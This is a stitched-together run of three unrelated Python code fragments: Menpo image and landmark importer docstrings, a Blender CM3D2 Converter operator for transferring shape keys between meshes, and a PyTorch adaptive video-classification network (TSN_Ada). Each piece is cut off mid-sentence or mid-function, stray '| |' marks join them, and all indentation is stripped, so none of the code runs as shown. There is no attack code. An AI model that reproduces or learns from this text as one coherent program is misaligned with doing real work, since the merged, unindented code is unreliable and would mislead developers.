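# Usage sketch (hypothetical path). The returned LazyList only decodes frames when
# they are accessed:
#
#   frames = import_video('/data/clips/interview.mp4')
#   first_frame = frames[0]        # decoded on demand
#   all_frames = list(frames)      # forces every frame to be read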
def import_landmark_file(filepath, asset=None):
r"""Single landmark group importer.
If a landmark file is found at ``filepath``, returns a
:map:`LandmarkGroup` representing it.
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to an landmark file.
Returns
-------
landmark_group : :map:`LandmarkGroup`
The :map:`LandmarkGroup` that the file format represents.
"""
return _import(filepath, image_landmark_types, asset=asset)
def import_pickle(filepath):
r"""Import a pickle file of arbitrary Python objects.
Menpo unambiguously uses ``.pkl`` as it's choice of extension for Pickle
files. Menpo also supports automatic importing and exporting of gzip
compressed pickle files - just choose a ``filepath`` ending ``pkl.gz`` and
gzip compression will automatically be applied. Compression can massively
reduce the filesize of a pickle file at the cost of longer import and
export times.
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to a ``.pkl`` or ``.pkl.gz`` file.
Returns
-------
object : `object`
Whatever Python objects are present in the Pickle file
"""
return _import(filepath, pickle_types)
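# Usage sketch (hypothetical paths); the '.pkl.gz' variant is decompressed
# transparently before unpickling:
#
#   model = import_pickle('/models/shape_model.pkl')
#   compressed_model = import_pickle('/models/shape_model.pkl.gz')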
def import_images(pattern, max_images=None, shuffle=False,
landmark_resolver=same_name, normalise=True,
as_generator=False, verbose=False):
r"""Multiple image (and associated landmarks) importer.
For each image found creates an importer than returns a :map:`Image` or
subclass representing it. By default, landmark files sharing the same
filename stem will be imported and attached with a group name based on the
extension of the landmark file, although this behavior can be customised
(see `landmark_resolver`). If the image defines a mask, this mask will be
imported.
Note that this is a function returns a :map:`LazyList`. Therefore, the
function will return immediately and indexing into the returned list
will load an image at run time. If all images should be loaded, then simply
wrap the returned :map:`LazyList` in a Python `list`.
Parameters
----------
pattern : `str`
A glob path pattern to search for images. Every image found to match
the glob will be imported one by one. See :map:`image_paths` for more
details of what images will be found.
max_images : positive `int`, optional
If not ``None``, only import the first ``max_images`` found. Else,
import all.
shuffle : `bool`, optional
If ``True``, the order of the returned images will be randomised. If
``False``, the order of the returned images will be alphanumerically
ordered.
landmark_resolver : `function`, optional
This function will be used to find landmarks for the
image. The function should take one argument (the image itself) and
return a dictionary of the form ``{'group_name': 'landmark_filepath'}``
Default finds landmarks with the same name as the image file.
normalise : `bool`, optional
If ``True``, normalise the image pixels between 0 and 1 and convert
to floating point. If false, the native datatype of the image will be
maintained (commonly `uint8`). Note that in general Menpo assumes
:map:`Image` instances contain floating point data - if you disable
this flag you will have to manually convert the images you import to
floating point before doing most Menpo operations. This however | |
# from the traveller-san/Blender-CM3D2-Converter repository
# "Properties" area → "Mesh Data" tab → "Shape Keys" panel → ▼ button
import time
import bpy
import bmesh
import mathutils
import traceback
from . import common
from . import compat
from . import model_export
# Add items to menus, etc.
def menu_func(self, context):
icon_id = common.kiss_icon()
self.layout.separator()
sub = self.layout.column()
self.layout.label(text="CM3D2 Converter", icon_value=icon_id)
sub.separator()
sub.operator('object.change_base_shape_key', icon='SHAPEKEY_DATA')
sub.operator('object.multiply_shape_key', icon=compat.icon('CON_SIZELIKE'))
sub.operator('object.blur_shape_key', icon='MOD_SMOOTH')
sub.separator()
sub.operator('object.copy_shape_key_values', icon='COPYDOWN')
sub.separator()
sub.operator('object.quick_shape_key_transfer', icon=compat.icon('MOD_DATA_TRANSFER'))
sub.operator('object.precision_shape_key_transfer', icon='MOD_MESHDEFORM')
sub.operator('object.weighted_shape_key_transfer', icon='MOD_VERTEX_WEIGHT')
sub.separator()
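# Registration note (an assumption - the hook-up is not shown in this file): menu_func
# follows Blender's usual "append a draw callback to an existing menu" pattern, so the
# add-on presumably registers it roughly like:
#
#   bpy.types.MESH_MT_shape_key_context_menu.append(menu_func)   # Blender 2.8x menu name
#   # (2.7x builds exposed the same menu as MESH_MT_shape_key_specials)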
class transfer_shape_key_iter:
index = -1
target_ob = None
source_ob = None
binded_shape_key = None
binded_shape_key_data = None
#target_mat = None
#source_mat = None
source_iter = None
source_shape_key_data = None
target_shape_key_data = None
def __init__(self, target_ob, source_ob, binded_shape_key=None):
self.target_ob = target_ob
self.source_ob = source_ob
self.binded_shape_key = binded_shape_key or self.source_ob.data.shape_keys.key_blocks[0]
def __iter__(self):
self.index = -1
if self.source_iter:
self.source_iter = iter(self.source_iter)
#self.target_mat = self.target_ob.matrix_world
#self.source_mat = self.source_ob.matrix_world
if self.source_ob and self.source_ob.data.shape_keys:
binded_index = self.source_ob.data.shape_keys.key_blocks.find(self.binded_shape_key.name)
#self.binded_shape_key_data = bmesh.new(use_operators=False)
#self.binded_shape_key_data.from_mesh(self.source_ob.data, use_shape_key=True, shape_key_index=binded_index)
#self.binded_shape_key_data.verts.ensure_lookup_table()
self.binded_shape_key_data = self.binded_shape_key.data
self.source_iter = iter(self.source_ob.data.shape_keys.key_blocks)
return self
def __next__(self):
target_me = self.target_ob.data
source_me = self.source_ob.data
target_shape_key = None
source_shape_key = next(self.source_iter, None)
if not source_shape_key:
raise StopIteration
self.index += 1
if target_me.shape_keys:
if source_shape_key.name in target_me.shape_keys.key_blocks:
target_shape_key = target_me.shape_keys.key_blocks[source_shape_key.name]
else:
target_shape_key = self.target_ob.shape_key_add(name=source_shape_key.name, from_mix=False)
else:
target_shape_key = self.target_ob.shape_key_add(name=source_shape_key.name, from_mix=False)
relative_key_name = source_shape_key.relative_key.name
rel_key = target_me.shape_keys.key_blocks.get(relative_key_name)
if rel_key:
target_shape_key.relative_key = rel_key
if not self.target_ob.active_shape_key_index == 0:
target_me.shape_keys.key_blocks[self.target_ob.active_shape_key_index].value = 0.0
if not self.source_ob.active_shape_key_index == 0:
source_me.shape_keys.key_blocks[self.source_ob.active_shape_key_index].value = 0.0
target_index = target_me.shape_keys.key_blocks.find(target_shape_key.name)
source_index = source_me.shape_keys.key_blocks.find(source_shape_key.name)
self.target_ob.active_shape_key_index = target_index
self.source_ob.active_shape_key_index = source_index
target_shape_key.value = 1.0
source_shape_key.value = 1.0
#source_shape_key_data = [compat.mul3(self.source_mat, source_shape_key.data[v.index].co, self.target_mat) - compat.mul3(self.source_mat, source_me.vertices[v.index].co, self.target_mat) for v in source_me.vertices]
#for i, v in enumerate(self.source_bind_data):
# shape_co = compat.mul3(self.source_mat, source_shape_key.data[i].co, self.target_mat)
# mesh_co = compat.mul3(self.source_mat, self.source_bind_data[i].co, self.target_mat)
# self.source_shape_key_data[i] = shape_co - mesh_co
#self.target_shape_key_data = bmesh.from_edit_mesh(self.target_ob.data)
#self.source_shape_key_data = bmesh.from_edit_mesh(self.source_ob.data)
#self.source_shape_key_data = bmesh.new(use_operators=False)
#self.source_shape_key_data.from_mesh(self.source_ob.data, use_shape_key=True, shape_key_index=source_index)
#self.target_shape_key_data.verts.ensure_lookup_table()
#self.source_shape_key_data.verts.ensure_lookup_table()
self.source_shape_key_data = source_shape_key.data
self.target_shape_key_data = target_shape_key.data
return self.index, target_shape_key, self.binded_shape_key_data, self.source_shape_key_data, self.target_shape_key_data
# update() will free resources for the current iteration of a loop, but not the loop itself.
def update(self, destructive=False):
pass
#if self.target_shape_key_data and self.target_shape_key_data.is_valid:
#bmesh.update_edit_mesh(self.target_ob.data, loop_triangles=True, destructive=destructive)
#self.target_shape_key_data.free()
#pass
#if self.source_shape_key_data and self.source_shape_key_data.is_valid:
#bmesh.update_edit_mesh(self.source_ob.data, loop_triangles=True, destructive=destructive)
#self.source_shape_key_data.free()
#pass
# free() will release all resources for the loop, leaving it unable to run unless iter() is used again.
def free(self, destructive=False):
pass
#self.update()
#if self.binded_shape_key_data and self.binded_shape_key_data.is_valid:
#bmesh.update_edit_mesh(self.source_ob.data, loop_triangles=True, destructive=destructive)
#self.binded_shape_key_data.free()
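# A rough usage sketch of this iterator (mirroring how the quick-transfer
# operator further below consumes it); the variable names here are illustrative:
#     it = iter(transfer_shape_key_iter(target_ob, source_ob))
#     for index, target_key, bind_data, src_data, dst_data in it:
#         # ...compute per-vertex offsets from src_data/bind_data and apply to dst_data...
#         it.update()   # release per-iteration resources only
#     it.free()         # release everything once the whole loop is done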
class shape_key_transfer_op:
is_first_remove_all = bpy.props.BoolProperty(name="First delete all shape keys", default=True)
is_remove_empty = bpy.props.BoolProperty(name="Remove shape key without deformation", default=True)
is_bind_current_mix = bpy.props.BoolProperty(name="Bind to current source mix", default=False)
subdivide_number = bpy.props.IntProperty(name="Split referrer", default=1, min=0, max=10, soft_min=0, soft_max=10)
target_ob = None
source_ob = None
og_source_ob = None
_start_time = 0
_timer = None
is_finished = False
is_canceled = False
pre_mode = None
pre_selected = None
binded_shape_key = None
kd = None
is_shapeds = {}
def draw(self, context):
self.layout.prop(self, 'is_first_remove_all', icon='ERROR' )
self.layout.prop(self, 'subdivide_number' , icon='LATTICE_DATA' )
self.layout.prop(self, 'is_remove_empty' , icon='X' )
self.layout.prop(self, 'is_bind_current_mix', icon='AUTOMERGE_OFF')
def execute(self, context):
self.pre_selected = list(context.selected_objects)
self.target_ob, self.source_ob, self.og_source_ob = common.get_target_and_source_ob(context, copySource=True)
self.og_source_ob.hide_set(True)
self._start_time = time.time()
self._timer = None
self.is_finished = False
self.is_canceled = False
self.pre_mode = self.target_ob.mode
self.binded_shape_key = None
self.source_bind_data = None
self.kd = None
self.is_shapeds = {}
bpy.ops.object.mode_set(mode='OBJECT')
try:
compat.link(context.scene, self.source_ob)
self.prepare(context)
except:
self.is_canceled = True
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while preparing shapekey transfer.")
self.cancel(context)
return {'FINISHED'}
else:
wm = context.window_manager
self._timer = wm.event_timer_add(1.0/60.0, window=context.window)
wm.modal_handler_add(self)
self.report(type={'INFO'}, message="Press ESC to cancel shape key transfer")
compat.set_active(context, self.target_ob)
return {'RUNNING_MODAL'}
def modal(self, context, event):
if event.type == 'ESC':
self.is_canceled = 'WARNING'
if not event.type == 'TIMER':
return {'PASS_THROUGH'}
#print("Run Modal")
if self.is_canceled:
#print("Canceled")
try:
self.cancel(context)
except:
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while canceling shapekey transfer.")
finally:
return {'FINISHED'}
if not self.is_canceled and not self.is_finished:
#print("Loop")
try:
self.is_finished = self.loop(context)
except:
self.is_canceled = True
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while performing shapekey transfer.")
finally:
return {'PASS_THROUGH'}
else:
#print("Finish")
try:
self.finish(context)
except:
self.is_canceled = True
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while finishing shapekey transfer.")
return {'PASS_THROUGH'}
else:
self.cleanup(context)
diff_time = time.time() - self._start_time
self.report(type={'INFO'}, message="%.2f Seconds" % diff_time)
return {'FINISHED'}
def prepare(self, context):
target_ob = self.target_ob
source_ob = self.source_ob
for ob in self.pre_selected:
compat.set_select(ob, False)
compat.set_active(context, source_ob)
#compat.set_select(source_og_ob, False)
#compat.set_select(target_ob, False)
# transform source's mesh now so there's no need to worry about it later
matrix_source_to_target = compat.mul(target_ob.matrix_world.inverted_safe(), source_ob.matrix_world)
source_ob.data.transform(matrix_source_to_target, shape_keys=True)
source_ob.matrix_world = target_ob.matrix_world
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.reveal()
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.subdivide(number_cuts=self.subdivide_number, smoothness=0.0, quadcorner='STRAIGHT_CUT', fractal=0.0, fractal_along_normal=0.0, seed=0)
bpy.ops.object.mode_set(mode='OBJECT')
if self.is_first_remove_all:
try:
target_ob.active_shape_key_index = 1
bpy.ops.object.shape_key_remove(all=True)
except:
pass
finally:
target_ob.active_shape_key_index = 0
else:
if target_ob.data.shape_keys:
for i, key in enumerate(target_ob.data.shape_keys.key_blocks):
if i == 0:
continue
else:
key.value = 0.0
target_ob.active_shape_key_index = 0
if self.is_bind_current_mix:
source_basis = source_ob.data.shape_keys.key_blocks[0]
old_basis = target_ob.data.shape_keys and next(iter(target_ob.data.shape_keys.key_blocks), False) or target_ob.shape_key_add()
old_basis.name = "__old_basis__" + old_basis.name
new_basis = target_ob.shape_key_add(name=source_basis.name)
self.binded_shape_key = source_ob.shape_key_add(name="__bind_shape_key", from_mix=True)
self.source_bind_data = self.binded_shape_key.data
compat.set_active(context, target_ob)
target_ob.active_shape_key_index = target_ob.data.shape_keys.key_blocks.find(new_basis.name)
# If moving the key to TOP still leaves it at index 1, move it UP once more
bpy.ops.object.shape_key_move(type='TOP')
if target_ob.active_shape_key_index == 1:
bpy.ops.object.shape_key_move(type='UP')
old_basis.relative_key = new_basis
source_ob.active_shape_key_index = source_ob.data.shape_keys.key_blocks.find(self.binded_shape_key.name)
else:
source_ob.active_shape_key_index = 0
self.source_bind_data = source_ob.data.vertices
#print(len(source_ob.data.vertices), len(self.source_bind_data))
self.kd = mathutils.kdtree.KDTree(len(self.source_bind_data))
for index, vert in enumerate(self.source_bind_data):
co = compat.mul(source_ob.matrix_world, vert.co)
self.kd.insert(co, index)
self.kd.balance()
for i, key in enumerate(source_ob.data.shape_keys.key_blocks):
if i == 0:
continue
else:
key.value = 0.0
def finish(self, context):
target_me = self.target_ob.data
if self.is_remove_empty:
for source_shape_key_name, is_shaped in reversed( list(self.is_shapeds.items()) ):
if not is_shaped:
target_shape_key = target_me.shape_keys.key_blocks.get(source_shape_key_name)
if not target_shape_key:
continue
key_blocks_values = target_me.shape_keys.key_blocks.values()
is_used = False
for key in key_blocks_values:
if key.relative_key == target_shape_key:
is_used = True
break
if not is_used:
self.target_ob.shape_key_remove(target_shape_key)
self.target_ob.active_shape_key_index = 0
def cancel(self, context):
report_type = (self.is_canceled == 'WARNING' and 'WARNING') or 'ERROR'
self.report(type={report_type}, message="Shape key transfer canceled. Results may not be as expected. Use Undo / Ctrl Z to revert changes")
self.cleanup(context)
def cleanup(self, context):
#compat.set_select(source_original_ob, True)
if self.target_ob:
#compat.set_select(target_ob, True)
compat.set_active(context, self.target_ob)
if self.og_source_ob:
self.og_source_ob.hide_set(False)
source_me = self.source_ob and self.source_ob.data
if source_me:
common.remove_data([self.source_ob, source_me])
elif self.source_ob:
common.remove_data([self.source_ob])
if self._timer:
wm = context.window_manager
wm.event_timer_remove(self._timer)
if self.pre_mode:
bpy.ops.object.mode_set(mode=self.pre_mode)
if self.pre_selected:
for ob in self.pre_selected:
compat.set_select(ob, True)
self.target_ob = None
self.source_ob = None
self._timer = None
self.pre_mode = None
self.pre_selected = None
self.binded_shape_key = None
self.kd = None
self.is_shapeds = {}
@compat.BlRegister()
class CNV_OT_quick_shape_key_transfer(shape_key_transfer_op, bpy.types.Operator):
bl_idname = 'object.quick_shape_key_transfer'
bl_label = "Quick shape key transfer"
bl_description = "Fast transfer of other selected mesh's shape keys to active mesh"
bl_options = {'REGISTER', 'UNDO'}
step_size = bpy.props.IntProperty(name="Step Size (low = quality, high = speed)", default=4, min=1, max=100, soft_min=1, soft_max=10, step=1)
near_vert_indexs = []
my_iter = None
@classmethod
def poll(cls, context):
obs = context.selected_objects
if len(obs) == 2:
active_ob = context.active_object
for ob in obs:
if ob.type != 'MESH':
return False
if ob.data.shape_keys and ob.name != active_ob.name:
return True
return False
def invoke(self, context, event):
return context.window_manager.invoke_props_dialog(self)
def draw(self, context):
shape_key_transfer_op.draw(self, context)
self.layout.prop(self, 'step_size')
def prepare(self, context):
shape_key_transfer_op.prepare(self, context)
target_me = self.target_ob.data
source_me = self.source_ob.data
self.near_vert_indexs = list( range(len(target_me.vertices)) )
for v in target_me.vertices:
near_co = compat.mul(self.target_ob.matrix_world, v.co) #v.co
self.near_vert_indexs[v.index] = self.kd.find(near_co)[1]
self.my_iter = iter( transfer_shape_key_iter(self.target_ob, self.source_ob, self.binded_shape_key) )
context.window_manager.progress_begin( 0, len(source_me.shape_keys.key_blocks) * len(target_me.vertices) )
context.window_manager.progress_update( 0 )
def loop(self, context):
source_shape_key_index, target_shape_key, binded_shape_key_data, source_shape_key_data, target_shape_key_data = next(self.my_iter, (-1, None, None, None, None))
#print(source_shape_key_index, target_shape_key, binded_shape_key_data, source_shape_key_data, target_shape_key_data)
if not target_shape_key:
context.window_manager.progress_end()
return True
progress = source_shape_key_index * len(self.target_ob.data.vertices)
def check(index):
near_vert_index = self.near_vert_indexs[index]
near_shape_co = source_shape_key_data[near_vert_index].co - binded_shape_key_data[near_vert_index].co
context.window_manager.progress_update( progress + index )
if abs(near_shape_co.length) > 2e-126: # effectively "non-zero": threshold far below any meaningful offset
target_shape_key_data[index].co += near_shape_co
return True
is_changed = False
just_changed = False
found_more = False
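# Interpretation of the loop below (not an authoritative description): only every
# step_size-th vertex is tested; whenever a tested vertex receives a non-negligible
# offset, the skipped neighbours within one stride on either side are tested too,
# so deformed regions get filled in while flat regions stay cheap to scan.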
for i in range(0, len(target_shape_key_data), self.step_size):
if check(i) or found_more:
is_changed = True
found_more = False
if not just_changed:
for j in range(i-self.step_size+1, i):
if j < len(target_shape_key_data) and j > 0:
found_more = check(j) or found_more
for k in range(i+1, i+self.step_size):
if k < len(target_shape_key_data) and k > 0:
found_more = check(k) or found_more
just_changed = True
else:
just_changed = False
if not self.is_shapeds.get(target_shape_key.name):
self.is_shapeds[target_shape_key.name] = is_changed
self.my_iter.update() # only call this when done with current iteration.
def cleanup(self, context):
self.near_vert_indexs = []
self.my_iter.free()
self.my_iter = None
shape_key_transfer_op.cleanup(self, context)
@compat.BlRegister()
class CNV_OT_precision_shape_key_transfer(shape_key_transfer_op, bpy.types.Operator):
bl_idname = 'object.precision_shape_key_transfer'
bl_label = "Precision shape key transfer"
bl_description = "Transfers the | |
import torch
import torchvision
from torch import nn
from ops.basic_ops import ConsensusModule
from ops.transforms import *
from torch.nn.init import normal_, constant_
import torch.nn.functional as F
from efficientnet_pytorch import EfficientNet
from ops.net_flops_table import feat_dim_dict
from torch.distributions import Categorical
def init_hidden(batch_size, cell_size):
init_cell = torch.Tensor(batch_size, cell_size).zero_()
if torch.cuda.is_available():
init_cell = init_cell.cuda()
return init_cell
class TSN_Ada(nn.Module):
def __init__(self, num_class, num_segments,
base_model='resnet101', consensus_type='avg', before_softmax=True, dropout=0.8,
crop_num=1, partial_bn=True, pretrain='imagenet', fc_lr5=False, args=None):
super(TSN_Ada, self).__init__()
self.num_segments = num_segments
self.reshape = True
self.before_softmax = before_softmax
self.dropout = dropout
self.crop_num = crop_num
self.consensus_type = consensus_type
self.pretrain = pretrain
self.fc_lr5 = fc_lr5
# TODO(yue)
self.args = args
self.rescale_to = args.rescale_to
if self.args.ada_reso_skip:
base_model = self.args.backbone_list[0] if len(self.args.backbone_list) >= 1 else None
self.base_model_name = base_model
self.num_class = num_class
self.multi_models = False
self.time_steps = self.num_segments
if self.args.ada_reso_skip:
self.reso_dim = self._get_resolution_dimension()
self.skip_dim = len(self.args.skip_list)
self.action_dim = self._get_action_dimension()
self._prepare_policy_net()
self._extends_to_multi_models()
self._prepare_base_model(base_model)
self._prepare_fc(num_class)
self.consensus = ConsensusModule(consensus_type, args=self.args)
if not self.before_softmax:
self.softmax = nn.Softmax()
self._enable_pbn = partial_bn
if partial_bn:
self.partialBN(True)
def _extends_to_multi_models(self):
if len(self.args.backbone_list) >= 1:
self.multi_models = True
self.base_model_list = nn.ModuleList()
self.new_fc_list = nn.ModuleList()
def _prep_a_net(self, model_name, shall_pretrain):
if "efficientnet" in model_name:
if shall_pretrain:
model = EfficientNet.from_pretrained(model_name)
else:
model = EfficientNet.from_name(model_name)
model.last_layer_name = "_fc"
else:
model = getattr(torchvision.models, model_name)(shall_pretrain)
if "resnet" in model_name:
model.last_layer_name = 'fc'
elif "mobilenet_v2" in model_name:
model.last_layer_name = 'classifier'
return model
def _get_resolution_dimension(self):
reso_dim = 0
for i in range(len(self.args.backbone_list)):
reso_dim += self.args.ada_crop_list[i]
if self.args.policy_also_backbone:
reso_dim += 1
return reso_dim
def _get_action_dimension(self):
action_dim = self.reso_dim + self.skip_dim
return action_dim
def _prepare_policy_net(self):
shall_pretrain = not self.args.policy_from_scratch
self.lite_backbone = self._prep_a_net(self.args.policy_backbone, shall_pretrain)
self.policy_feat_dim = feat_dim_dict[self.args.policy_backbone]
self.rnn = nn.LSTMCell(input_size=self.policy_feat_dim, hidden_size=self.args.hidden_dim, bias=True)
def _prepare_base_model(self, base_model):
self.input_size = 224
self.input_mean = [0.485, 0.456, 0.406]
self.input_std = [0.229, 0.224, 0.225]
if self.args.ada_reso_skip:
shall_pretrain = len(self.args.model_paths) == 0 or self.args.model_paths[0].lower() != 'none'
for bbi, backbone_name in enumerate(self.args.backbone_list):
model = self._prep_a_net(backbone_name, shall_pretrain)
self.base_model_list.append(model)
else:
self.base_model = self._prep_a_net(base_model, self.pretrain == 'imagenet')
def _prepare_fc(self, num_class):
def make_a_linear(input_dim, output_dim):
linear_model = nn.Linear(input_dim, output_dim)
normal_(linear_model.weight, 0, 0.001)
constant_(linear_model.bias, 0)
return linear_model
i_do_need_a_policy_network = True
if self.args.ada_reso_skip and i_do_need_a_policy_network:
setattr(self.lite_backbone, self.lite_backbone.last_layer_name, nn.Dropout(p=self.dropout))
feed_dim = self.args.hidden_dim if not self.args.frame_independent else self.policy_feat_dim
self.linear = make_a_linear(feed_dim, self.action_dim)
self.lite_fc = make_a_linear(feed_dim, num_class)
if self.multi_models:
multi_fc_list = [None]
for bbi, base_model in enumerate(self.base_model_list):
for fc_i, exit_index in enumerate(multi_fc_list):
last_layer_name = base_model.last_layer_name
feature_dim = getattr(base_model, last_layer_name).in_features
new_fc = make_a_linear(feature_dim, num_class)
self.new_fc_list.append(new_fc)
setattr(base_model, last_layer_name, nn.Dropout(p=self.dropout))
elif self.base_model_name is not None:
if "mobilenet_v2" == self.base_model_name:
feature_dim = getattr(self.base_model, self.base_model.last_layer_name)[1].in_features
else:
feature_dim = getattr(self.base_model, self.base_model.last_layer_name).in_features
setattr(self.base_model, self.base_model.last_layer_name, nn.Dropout(p=self.dropout))
self.new_fc = make_a_linear(feature_dim, num_class)
def train(self, mode=True):
"""
Override the default train() to freeze the BN parameters
:return:
"""
super(TSN_Ada, self).train(mode)
if self._enable_pbn and mode:
print("Freezing BatchNorm2D except the first one.")
if self.args.ada_reso_skip:
models = [self.lite_backbone]
if self.multi_models:
models = models + self.base_model_list
else:
models = [self.base_model]
for the_model in models:
count = 0
bn_scale = 1
for m in the_model.modules():
if isinstance(m, nn.BatchNorm2d): # TODO(yue)
count += 1
if count >= (2 * bn_scale if self._enable_pbn else bn_scale):
m.eval()
# shutdown update in frozen mode
m.weight.requires_grad = False
m.bias.requires_grad = False
def partialBN(self, enable):
self._enable_pbn = enable
def get_optim_policies(self):
first_conv_weight = []
first_conv_bias = []
normal_weight = []
normal_bias = []
lr5_weight = []
lr10_bias = []
bn = []
custom_ops = []
conv_cnt = 0
bn_cnt = 0
for m in self.modules():
if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d):
ps = list(m.parameters())
conv_cnt += 1
if conv_cnt == 1:
first_conv_weight.append(ps[0])
if len(ps) == 2:
first_conv_bias.append(ps[1])
else:
normal_weight.append(ps[0])
if len(ps) == 2:
normal_bias.append(ps[1])
elif isinstance(m, torch.nn.Linear):
ps = list(m.parameters())
if self.fc_lr5:
lr5_weight.append(ps[0])
else:
normal_weight.append(ps[0])
if len(ps) == 2:
if self.fc_lr5:
lr10_bias.append(ps[1])
else:
normal_bias.append(ps[1])
elif isinstance(m, torch.nn.BatchNorm2d):
bn_cnt += 1
# later BN's are frozen
if not self._enable_pbn or bn_cnt == 1:
bn.extend(list(m.parameters()))
elif isinstance(m, torch.nn.LSTMCell):
ps = list(m.parameters())
normal_weight.append(ps[0])
normal_weight.append(ps[1])
normal_bias.append(ps[2])
normal_bias.append(ps[3])
elif len(m._modules) == 0:
if len(list(m.parameters())) > 0:
raise ValueError("New atomic module type: {}. Need to give it a learning policy".format(type(m)))
return [
{'params': first_conv_weight, 'lr_mult': 1, 'decay_mult': 1,
'name': "first_conv_weight"},
{'params': first_conv_bias, 'lr_mult': 2, 'decay_mult': 0,
'name': "first_conv_bias"},
{'params': normal_weight, 'lr_mult': 1, 'decay_mult': 1,
'name': "normal_weight"},
{'params': normal_bias, 'lr_mult': 2, 'decay_mult': 0,
'name': "normal_bias"},
{'params': bn, 'lr_mult': 1, 'decay_mult': 0,
'name': "BN scale/shift"},
{'params': custom_ops, 'lr_mult': 1, 'decay_mult': 1,
'name': "custom_ops"},
# for fc
{'params': lr5_weight, 'lr_mult': 5, 'decay_mult': 1,
'name': "lr5_weight"},
{'params': lr10_bias, 'lr_mult': 10, 'decay_mult': 0,
'name': "lr10_bias"},
]
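# The parameter groups returned above are intended to be expanded into per-group
# optimizer settings. A minimal sketch, assuming an SGD optimizer and external
# args.lr / args.weight_decay values (both assumptions, not defined in this file):
#     policies = model.get_optim_policies()
#     optimizer = torch.optim.SGD(
#         [{'params': g['params'],
#           'lr': args.lr * g['lr_mult'],
#           'weight_decay': args.weight_decay * g['decay_mult']}
#          for g in policies],
#         momentum=0.9)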
def backbone(self, input_data, the_base_model, new_fc, signal=-1, indices_list=[], boost=False, b_t_c=False,
**kwargs):
_b, _tc, _h, _w = input_data.shape # TODO(yue) input (B, T*C, H, W)
_t, _c = _tc // 3, 3
if b_t_c:
input_b_t_c = input_data.view(_b, _t, _c, _h, _w)
else:
input_2d = input_data.view(_b * _t, _c, _h, _w)
if b_t_c:
feat = the_base_model(input_b_t_c, signal=signal, **kwargs)
else:
feat = the_base_model(input_2d)
_base_out = None
if b_t_c:
if new_fc is not None:
_base_out = new_fc(feat.view(_b * _t, -1)).view(_b, _t, -1)
else:
if new_fc is not None:
_base_out = new_fc(feat).view(_b, _t, -1)
feat = feat.view(_b, _t, -1)
return feat, _base_out
def get_lite_j_and_r(self, input_list, online_policy, tau):
feat_lite, _ = self.backbone(input_list[self.args.policy_input_offset], self.lite_backbone, None)
r_list = []
lite_j_list = []
batch_size = feat_lite.shape[0]
hx = init_hidden(batch_size, self.args.hidden_dim)
cx = init_hidden(batch_size, self.args.hidden_dim)
remain_skip_vector = torch.zeros(batch_size, 1)
old_hx = None
old_r_t = None
if self.args.use_reinforce:
log_prob_r_list = []
prob_r_list = []
for t in range(self.time_steps):
if self.args.frame_independent:
feat_t = feat_lite[:, t]
else:
hx, cx = self.rnn(feat_lite[:, t], (hx, cx))
feat_t = hx
if self.args.use_reinforce:
p_t = F.softmax(self.linear(feat_t), dim=1).clamp(min=1e-8)
else:
p_t = torch.log(F.softmax(self.linear(feat_t), dim=1).clamp(min=1e-8))
j_t = self.lite_fc(feat_t)
lite_j_list.append(j_t) # TODO as pred
# TODO (yue) need a simple case to illustrate this
if online_policy:
if self.args.use_reinforce:
m = Categorical(p_t)
prob_r_list.append(p_t)
r_t_idx = m.sample()
r_t = torch.eye(self.action_dim)[r_t_idx].cuda()
log_prob_r_t = m.log_prob(r_t_idx)
log_prob_r_list.append(log_prob_r_t)
else:
r_t = torch.cat(
[F.gumbel_softmax(p_t[b_i:b_i + 1], tau, True) for b_i in range(p_t.shape[0])])
# TODO update states and r_t
if old_hx is not None:
take_bool = remain_skip_vector > 0.5
take_old = torch.tensor(take_bool, dtype=torch.float).cuda()
take_curr = torch.tensor(~take_bool, dtype=torch.float).cuda()
hx = old_hx * take_old + hx * take_curr
r_t = old_r_t * take_old + r_t * take_curr
# TODO update skipping_vector
for batch_i in range(batch_size):
for skip_i in range(self.action_dim - self.reso_dim):
# TODO(yue) first condition to avoid valuing skip vector forever
if remain_skip_vector[batch_i][0] < 0.5 and r_t[batch_i][self.reso_dim + skip_i] > 0.5:
remain_skip_vector[batch_i][0] = self.args.skip_list[skip_i]
old_hx = hx
old_r_t = r_t
r_list.append(r_t) # TODO as decision
remain_skip_vector = (remain_skip_vector - 1).clamp(0)
if online_policy:
if self.args.use_reinforce:
return lite_j_list, torch.stack(r_list, dim=1), torch.stack(log_prob_r_list, dim=1)
else:
return lite_j_list, torch.stack(r_list, dim=1)
else:
return lite_j_list, None
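# Summary of the returns above: lite_j_list holds the policy branch's per-step
# class logits, r_list (when stacked) holds the per-step one-hot decisions over
# the reso_dim + skip_dim action space, and the extra log-prob tensor is only
# produced in the REINFORCE setting.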
def using_online_policy(self):
if any([self.args.offline_lstm_all, self.args.offline_lstm_last]):
return False
elif any([self.args.random_policy, self.args.all_policy]):
return False
elif self.args.real_scsampler:
return False
else:
return True
def input_fusion(self, input_data, r):
# TODO data: B * TC * H * W
# TODO r : B * T * T
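# In other words, each sample's r is used as a T x T frame-mixing matrix: output
# frame i becomes a weighted combination of the input frames, optionally biased
# toward the identity and/or masked to a lower-triangular (causal) pattern below.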
_b, _tc, _h, _w = input_data.shape
_c = _tc // self.args.num_segments
fuse_data_list = []
for bi in range(_b):
if self.args.identity_prior:
prior = torch.eye(self.args.num_segments).to(input_data.device)
else:
prior = 0
if self.args.lower_mask:
mask = torch.tril(torch.ones(self.args.num_segments, self.args.num_segments)).to(input_data.device)
else:
mask = 1
real_r = (r[bi] + prior) * mask
if self.args.direct_lower_mask:
real_r = torch.tril(real_r)
if self.args.row_normalization:
real_r = real_r / (real_r.sum(dim=1, keepdim=True).clamp_min(1e-6))
fused_data = torch.matmul(real_r, input_data[bi].view(self.args.num_segments, _c * _h * _w))
fuse_data_list.append(fused_data)
return torch.stack(fuse_data_list, dim=0).view(_b, _tc, _h, _w)
def get_feat_and_pred(self, input_list, r_all, **kwargs):
feat_out_list = []
base_out_list = []
ind_list = []
for bb_i, the_backbone in enumerate(self.base_model_list):
feat_out, base_out = self.backbone(input_list[bb_i], the_backbone, self.new_fc_list[bb_i])
feat_out_list.append(feat_out)
base_out_list.append(base_out)
